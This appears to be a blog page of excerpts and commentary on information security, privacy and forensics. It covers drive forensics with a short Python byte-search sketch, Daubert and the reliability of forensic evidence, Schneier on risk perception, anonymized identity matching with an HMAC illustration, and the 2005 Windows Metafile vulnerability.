It would be interesting to analyze that drive to see if anyone else was using it during the period between when it went to Best Buy, and when it turned up at the garage sale. We once discovered who stole, and then returned, a Macintosh from a department at the University of Minnesota with its drive erased. We did a hex search of the drive surface for the words “high score”. There was the name of the thief, one of the janitors, who confessed when presented with evidence.
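
The same trick takes a few lines with any raw-access tool. A minimal Python sketch (the path is illustrative and assumes a dd image of the drive; reading a device node such as /dev/sda directly requires root). The principle is unchanged today: “erasing” a filesystem leaves most file contents intact on the platter.

# Chunked search of a raw disk image for a byte pattern, with reads
# overlapped so a match cannot hide across a chunk boundary.
PATTERN = b"high score"
CHUNK = 1 << 20  # 1 MB reads

with open("disk.img", "rb") as disk:
    offset, tail = 0, b""
    while True:
        block = disk.read(CHUNK)
        if not block:
            break
        buf = tail + block
        i = buf.find(PATTERN)
        while i != -1:
            print(f"hit at byte {offset - len(tail) + i}")
            i = buf.find(PATTERN, i + 1)
        tail = buf[-(len(PATTERN) - 1):]
        offset += len(block)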

Search for “high score” told them who stole the PC Read More »

Google’s data trove tempts the bad guys

From “Fuzzy maths” (The Economist: 11 May 2006):

Slowly, the company is realising that it is so important that it may not be able to control the ramifications of its own actions. “As more and more data builds up in the company’s disk farms,” says Edward Felten, an expert on computer privacy at Princeton University, “the temptation to be evil only increases. Even if the company itself stays non-evil, its data trove will be a massive temptation for others to do evil.”

Google’s data trove tempts the bad guys Read More »

Court acceptance of forensic & biometric evidence

From Brendan I. Koerner’s “Under the Microscope” (Legal Affairs: July/August 2002):

The mantra of forensic evidence examination is “ACE-V.” The acronym stands for Analysis, Comparison, Evaluation, and Verification, which forensic scientists compare with the step-by-step method drilled into countless chemistry students. “Instead of hypothesis, data collection, conclusion, we have ACE-V,” says Elaine Pagliaro, an expert at the Connecticut lab who specializes in biochemical analysis. “It’s essentially the same process. It’s just that it grew out of people who didn’t come from a background in the scientific method.” …

Yet for most of the 20th century, courts seldom set limits on what experts could say to juries. The 1923 case Frye v. United States mandated that expert witnesses could discuss any technique that had “gained general acceptance in the particular field in which it belongs.” Courts treated forensic science as if it were as well-founded as biology or physics. …

In 1993, the Supreme Court set a new standard for evidence that took into account the accelerated pace of scientific progress. In a case called Daubert v. Merrell Dow Pharmaceuticals, the plaintiffs wanted to show the jury some novel epidemiological studies to bolster their claim that Merrell Dow’s anti-nausea drug Bendectin caused birth defects. The trial judge didn’t let them. The plaintiff’s evidence, he reasoned, was simply too futuristic to have gained general acceptance.

When the case got to the Supreme Court, the justices seized the opportunity to revolutionize the judiciary’s role in supervising expert testimony. Writing for a unanimous court, Justice Harry Blackmun instructed judges to “ensure that any and all scientific testimony or evidence admitted is not only relevant, but reliable.” Daubert turned judges into “gatekeepers” responsible for discerning good science from junk before an expert takes the stand. Blackmun suggested that good science must be testable, subject to peer review, and feature a “known or potential rate of error.” …

There are a few exceptions, though. In 1999, Judge Nancy Gertner of the Federal District Court in Massachusetts set limits on the kinds of conclusions a handwriting expert could draw before a jury in United States v. Hines. The expert could point out similarities between the defendant’s handwriting and the writing on a stick-up note, the judge said, but she could not “make any ultimate conclusions on the actual authorship.” The judge questioned “the validity of the field” of handwriting analysis, noting that “one’s handwriting is not at all unique in the sense that it remains the same over time, or unique[ly] separates one individual from another.”

Early this year, Judge Pollak stunned the legal world by similarly reining in fingerprint experts in the murder-for-hire case United States v. Plaza. Pollak was disturbed by a proficiency test finding that 26 percent of the crime labs surveyed in different states did not correctly identify a set of latent prints on the first try. “Even 100 years of ‘adversarial’ testing in court cannot substitute for scientific testing,” he said. He ruled that the experts could show the jury similarities between the defendants’ prints and latent prints found at the crime scenes, but could not say the prints matched. …

… the University of West Virginia recently offered the nation’s first-ever four-year degree in biometrics …

Court acceptance of forensic & biometric evidence Read More »

5 reasons people exaggerate risk

From Bruce Schneier’s “Movie Plot Threat Contest: Status Report”:

In my book, Beyond Fear, I discuss five different tendencies people have to exaggerate risks: to believe that something is more risky than it actually is.

1. People exaggerate spectacular but rare risks and downplay common risks.
2. People have trouble estimating risks for anything not exactly like their normal situation.
3. Personified risks are perceived to be greater than anonymous risks.
4. People underestimate risks they willingly take and overestimate risks in situations they can’t control.
5. People overestimate risks that are being talked about and remain an object of public scrutiny.

5 reasons people exaggerate risk Read More »

Matching identities across databases, anonymously

From MIT Technology Review’s “Blindfolding Big Brother, Sort of”:

In 1983, entrepreneur Jeff Jonas founded Systems Research and Development (SRD), a firm that provided software to identify people and determine who was in their circle of friends. In the early 1990s, the company moved to Las Vegas, where it worked on security software for casinos. Then, in January 2005, IBM acquired SRD and Jonas became chief scientist in the company’s Entity Analytic Solutions group.

His newest technology, which allows entities such as government agencies to match an individual found in one database to that same person in another database, is getting a lot of attention from governments, banks, health-care providers, and, of course, privacy advocates. Jonas claims that his technology is as good at protecting privacy as it is at finding important information. …

JJ: The technique that we have created allows the bank to anonymize its customer data. When I say “anonymize,” I mean it changes the name and address and date of birth, or whatever data they have about an identity, into a numeric value that is nonhuman readable and nonreversible. You can’t run the math backwards and compute from the anonymized value what the original input value was. …

Here’s the scenario: The government has a list of people we should never let into the country. It’s a secret. They don’t want people in other countries to know. And the government tends to not share this list with corporate America. Now, if you have a cruise line, you want to make sure you don’t have people getting on your boat who shouldn’t even be in the United States in the first place. Prior to the U.S. Patriot Act, the government couldn’t go and subpoena 100,000 records every day from every company. Usually, the government would have to go to a cruise line and have a subpoena for a record. Section 215 [of the Patriot Act] allows the government to go to a business entity and say, “We want all your records.” Now, the Fourth Amendment, which is “search and seizure,” has a legal test called “reasonable and particular.” Some might argue that if a government goes to a cruise line and says, “Give us all your data,” it is hard to envision that this would be reasonable and particular.

But what other solution do they have? There was no other solution. Our Anonymous Resolution technology would allow a government to take its secret list and anonymize it, allow a cruise line to anonymize their passenger list, and then when there’s a match it would tell the government: “record 123.” So they’d look it up and say, “My goodness, it’s Majed Moqed.” And it would tell them which record to subpoena from which organization. Now it’s back to reasonable and particular. ….
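
Jonas does not reveal the algorithm, but the flavor of the scheme can be sketched with a keyed one-way hash that both parties apply to normalized records before comparing digests. The sketch below is a simplified illustration under stated assumptions (a shared key, crude normalization, made-up data), not IBM/SRD’s actual Anonymous Resolution method; the genuinely hard part, matching despite the natural variability of identity data, is what Jonas discusses next.

import hashlib
import hmac

KEY = b"secret negotiated out of band"  # demo assumption

def anonymize(name: str, dob: str) -> str:
    # Crude normalization; the real product copes with far messier variability.
    record = f"{name.strip().upper()}|{dob}"
    return hmac.new(KEY, record.encode(), hashlib.sha256).hexdigest()

# The government anonymizes its secret list; the cruise line, its manifest.
watchlist = {anonymize("Majed Moqed", "1970-01-01"): "record 123"}  # illustrative date of birth
manifest = {anonymize("  majed moqed", "1970-01-01"): "cabin 4B"}

# Only opaque digests cross the boundary; a hit yields a record pointer
# that the government can then subpoena specifically.
for digest, cabin in manifest.items():
    if digest in watchlist:
        print(f"match: {watchlist[digest]} <-> {cabin}")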

TR: How is this based on earlier work you did for Las Vegas casinos?

JJ: The ability to figure out if two people are the same, despite all the natural variability in how people express their identity, is something we got a good understanding of while assisting the gaming industry. We also learned how people try to fabricate fake identities and how they try to evade systems. It was learning how to do that at high speed that opened the door to make this next thing possible. Had we not solved that in the 1990s, we would not have been able to conjure up a method to do anonymous resolution.

Matching identities across databases, anonymously Read More »

Killer search terms

From The Inquirer’s “Killer phrase will fill your PC with spam”:

THERE IS ONE phrase which, if you type it into any search engine, will expose your PC to shed-loads of spam, according to a new report.

Researchers Ben Edelman and Hannah Rosenbaum reckon that typing the phrase “Free Screensavers” into any search engine is the equivalent of lighting a blue touch paper and standing well back. …

More than 64 per cent of sites linked to this phrase will cause you some trouble, either with spyware or adware. The report found 1,394 popular keyword searches, via Google, Yahoo, MSN, AOL and Ask, that were linked to spyware or adware, and the list is quite amusing. Do not type the following words into any search engine:

Bearshare
Screensavers
Winmx
Limewire
Download Yahoo messenger
Lime wire
Free ringtones

Killer search terms Read More »

Problems with fingerprints for authentication

From lokedhs’ “There is much truth in what you say”:

The problem with fingerprints is that it’s inherently a very insecure way of authentication for two reasons:

Firstly, you can’t change it if it leaks out. A password or a credit card number can be easily changed and the damage minimised in case of an information leak. Doing this with a fingerprint is much harder.

Secondly, the fingerprint is very hard to keep secret. Your body has this annoying ability to leave copies of your identification token all over the place, very easy for anyone to pick up.

Problems with fingerprints for authentication Read More »

Why infosec is so hard

From Noam Eppel’s “Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security”:

A cyber-criminal only needs to identify a single vulnerability in a system’s defenses in order to breach its security. Information security professionals, however, need to identify every single vulnerability and potential risk, and come up with a suitable and practical fix or mitigation strategy for each.

Why infosec is so hard Read More »

Windows Metafile vulnerability

From Noam Eppel’s “Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security”:

On Dec. 27, 2005 a Windows Metafile (.WMF) flaw was discovered affecting fully patched versions of XP and Windows 2003 Web Server. Simply by viewing an image on a web site, in an email, or sent via instant messenger, code can be injected and run on the target computer. The vulnerability was in the Windows Graphics Rendering Engine, which handles WMF files, so all programs that process this type of file, such as Internet Explorer, Outlook and Windows Picture and Fax Viewer, were affected.

Within hours, hundreds of sites started to take advantage of the vulnerability to distribute malware. Four days later, the first instant messenger worm exploiting the .wmf vulnerability was found. Six days later, Panda Software discovered WMFMaker, an easy-to-use tool which allows anyone to create a malicious WMF file that exploits the vulnerability.

While it took mere hours for cybercriminals to take advantage of the vulnerability, it took Microsoft nine days to release an out-of-cycle patch to fix the vulnerability. For nine entire days the general public was left with no valid defenses.

The WMF flaw was a security nightmare and a cybercriminal’s dream. It was a vulnerability which (a) affected the large majority of Windows computers, (b) was easy to exploit, as the victim simply had to view an image contained on a web site or in an email, and (c) was a true zero-day, with no patch available for nine days. During those nine days, the majority of the general population had no idea how vulnerable they were.

Windows Metafile vulnerability Read More »

IE unsafe 98% of the time

From Noam Eppel’s “Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security”:

The security company Scanit recently conducted a survey which tracked three web browsers (MSIE, Firefox, Opera) in 2004 and counted the days on which each was “known unsafe.” Their definition of “known unsafe”: a remotely exploitable security vulnerability had been publicly announced and no patch was yet available. Microsoft Internet Explorer, which is the most popular browser in use today and installed by default on most Windows-based computers, was 98% unsafe. Astonishingly, there were only 7 days in 2004, a leap year of 366 days, without an unpatched publicly disclosed security hole. Read that last sentence again if you have to.

IE unsafe 98% of the time Read More »